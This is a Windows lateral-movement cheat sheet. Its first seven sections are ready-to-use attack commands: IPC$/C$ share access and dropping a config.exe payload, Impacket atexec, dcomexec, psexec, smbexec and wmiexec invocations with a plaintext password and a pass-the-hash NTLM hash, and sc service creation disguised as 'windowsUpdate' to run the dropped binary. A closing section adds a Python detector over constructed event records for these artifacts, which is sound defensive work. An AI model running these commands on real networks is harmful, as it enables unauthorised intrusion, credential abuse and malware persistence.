1. Establishing an IPC$ connection
net use \\ip\ipc$ "password" /user:"username"
dir \\ip\c$\programdata
copy C:\Users\xx.txt \\ip\c$\programdata\config.exe
del \\ip\c$\1.txt
View current IPC connections
net use
Delete the IPC connection
net use \\ip /del /y
2. Impacket suite: atexec.py
proxychains python3 atexec.py test/administrator:1qaz@WSXAa@10.0.0.200 'whoami' -codec=BIG5
proxychains python3 atexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 test/administrator@10.0.0.200 'whoami' -codec=BIG5
3. Impacket suite: dcomexec.py
proxychains python3 dcomexec.py test/administrator:1qaz@WSXAa@10.0.0.200
proxychains python3 dcomexec.py test/administrator:1qaz@WSXAa@10.0.0.200 whoami -codec=BIG5
proxychains python3 dcomexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 administrator:@10.0.0.200
4. Impacket suite: psexec.py
proxychains python3 psexec.py test/administrator:1qaz\@WSXAa@10.0.0.200 'whoami' -codec=BIG5
proxychains python3 psexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 test/administrator@10.0.0.200 'whoami' -codec=BIG5
5. Impacket suite: smbexec.py
proxychains python3 smbexec.py test/administrator:1qaz\@WSXAa@10.0.0.200
proxychains python3 smbexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 test/administrator@10.0.0.200
6. Impacket suite: wmiexec.py
proxychains python3 wmiexec.py test/administrator:1qaz\@WSXAa@10.0.0.200
proxychains python3 wmiexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 test/administrator@10.0.0.200
proxychains python3 wmiexec.py -hashes :d40d3cdfe20620b28f46e82f5c962414 test/administrator@10.0.0.200 "ipconfig" -codec=BIG5
7. Creating a service with sc to execute a command
sc \\192.168.0.23 create windowsUpdate binpath= "cmd.exe /c c:\programdata\config.exe"
sc \\192.168.0.23 start windowsUpdate
sc \\192.168.0.23 delete windowsUpdate
sc create "SUpdate5" binpath= "cmd /c start "C:\programdata\config2.exe""&&sc config "SUpdate5" start= auto&&net start SUpdate5
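Every technique on this sheet leaves a host-side trace: admin-share access (IPC$, C$, ADMIN$) for the net use/copy steps, a new service whose ImagePath runs cmd.exe /c for the psexec/smbexec/sc variants, and a scheduled task for atexec. The following detector is an added defender-side example, not part of the original sheet; it runs over constructed sample records whose fields mirror Windows Security 5140/4698 and System 7045 events, and the field names and sample values are assumptions, not real logs.

```python
"""Flag the lateral-movement artifacts listed in the sheet above in
Windows event records.  EVENTS below are constructed samples (not real
logs); the field names are a simplified subset of the Windows schema."""
import re

# Constructed sample events: two admin-share accesses, one malicious
# service install, one benign service install, one scheduled task.
EVENTS = [
    {"id": 5140, "src_ip": "10.0.0.50", "user": "administrator", "share": r"\\*\IPC$"},
    {"id": 5140, "src_ip": "10.0.0.50", "user": "administrator", "share": r"\\*\C$"},
    {"id": 7045, "service": "windowsUpdate",
     "image": r"cmd.exe /c c:\programdata\config.exe"},
    {"id": 7045, "service": "Sense",
     "image": r"C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe"},
    {"id": 4698, "task": r"\xYzAbCdE", "author": "administrator",
     "command": r"cmd.exe /C whoami > C:\Windows\Temp\out.txt"},
]

# Share names reached through a UNC path that end in IPC$, C$ or ADMIN$.
ADMIN_SHARES = re.compile(r"\\(IPC|C|ADMIN)\$$", re.I)
# Command lines that spawn a shell or execute from ProgramData, the two
# patterns the sc/psexec/smbexec/atexec entries above all share.
SUSPICIOUS_CMD = re.compile(r"(cmd(\.exe)?\s+/c|%COMSPEC%|\\programdata\\)", re.I)


def detect(events):
    """Return (kind, subject, detail) tuples for each suspicious event:
    remote admin-share use, a service whose ImagePath spawns cmd.exe,
    or a scheduled task whose action spawns cmd.exe."""
    findings = []
    for ev in events:
        if ev["id"] == 5140 and ADMIN_SHARES.search(ev["share"]):
            findings.append(("admin_share_access", ev["src_ip"], ev["share"]))
        elif ev["id"] == 7045 and SUSPICIOUS_CMD.search(ev["image"]):
            findings.append(("service_exec", ev["service"], ev["image"]))
        elif ev["id"] == 4698 and SUSPICIOUS_CMD.search(ev["command"]):
            findings.append(("task_exec", ev["task"], ev["command"]))
    return findings


if __name__ == "__main__":
    for finding in detect(EVENTS):
        print(finding)
```

Feeding the same logic real 5140/7045/4698 records from a SIEM, and correlating the share access with the service or task creation from the same source host within a short window, gives a high-confidence signal for the whole chain rather than its individual steps.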